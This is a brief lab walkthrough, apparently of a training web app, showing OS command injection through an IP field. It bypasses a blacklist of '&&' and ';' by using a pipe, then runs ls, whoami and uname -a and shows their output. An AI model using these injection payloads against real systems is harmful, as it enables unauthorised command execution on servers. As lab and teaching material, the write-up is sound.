### Objective

Remotely, find out the user of the web service on the OS, as well as the machines hostname via RCE.

Let's try it out first.
Trying out
```txt
192;ls
```
Gives us nothing.
```txt
192;l's
```
Also nothing.
Checking out the source code there is a blacklist.
```php
`$substitutions = array( '&&' => '', ';' => '',  
    );`
```
Let's try the pipe symbol.
```txt
192 | ls
```
```txt
help
index.php
source
```
Seems to work.
Let's get the user of the web service and machine host name
```txt
192 | whoami
```
```txt
www-data
```
```txt
192 | 'uname -a'
```
```txt
Linux 920c21f487f5 5.10.0-6parrot1-amd64 #1 SMP Debian 5.10.28-6parrot1 (2021-04-12) x86_64 GNU/Linux
```